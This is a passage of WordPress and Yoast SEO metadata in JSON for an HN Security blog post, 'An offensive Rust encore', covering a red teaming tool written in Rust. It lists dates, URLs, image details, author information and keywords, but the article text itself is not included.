encore\",\"datePublished\":\"2024-12-10T07:28:16+00:00\",\"dateModified\":\"2025-10-21T09:08:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"},\"wordCount\":1513,\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"keywords\":[\"mimikatz\",\"minidump\",\"tactical exploitation\",\"windows\",\"red teaming\",\"rust\"],\"articleSection\":[\"Tools\",\"Articles\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\",\"name\":\"HN Security - An offensive Rust encore -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"datePublished\":\"2024-12-10T07:28:16+00:00\",\"dateModified\":\"2025-10-21T09:08:11+00:00\",\"description\":\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/RUST.jpg\",\"width\":1600,\"height\":836,\"caption\":\"Rust logo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"An offensive Rust encore\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"name\":\"HN Security\",\"description\":\"Offensive Security Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\",\"name\":\"Marco Ivaldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"caption\":\"Marco Ivaldi\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/marco-ivaldi\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security - An offensive Rust encore -","description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - An offensive Rust encore -","og_description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","og_url":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","og_site_name":"HN Security","article_published_time":"2024-12-10T07:28:16+00:00","article_modified_time":"2025-10-21T09:08:11+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","type":"image\/jpeg"}],"author":"Marco Ivaldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Marco Ivaldi","Tempo di lettura stimato":"8 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"},"author":{"name":"Marco Ivaldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f"},"headline":"An offensive Rust encore","datePublished":"2024-12-10T07:28:16+00:00","dateModified":"2025-10-21T09:08:11+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"},"wordCount":1513,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","keywords":["mimikatz","minidump","tactical exploitation","windows","red teaming","rust"],"articleSection":["Tools","Articles"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","url":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","name":"HN Security - An offensive Rust encore -","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","datePublished":"2024-12-10T07:28:16+00:00","dateModified":"2025-10-21T09:08:11+00:00","description":"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","width":1600,"height":836,"caption":"Rust logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"An offensive Rust encore"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f","name":"Marco Ivaldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","caption":"Marco Ivaldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/marco-ivaldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=3576"}],"version-history":[{"count":4,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576\/revisions"}],"predecessor-version":[{"id":161117,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/3576\/revisions\/161117"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159953"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=3576"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=3576"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=3576"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}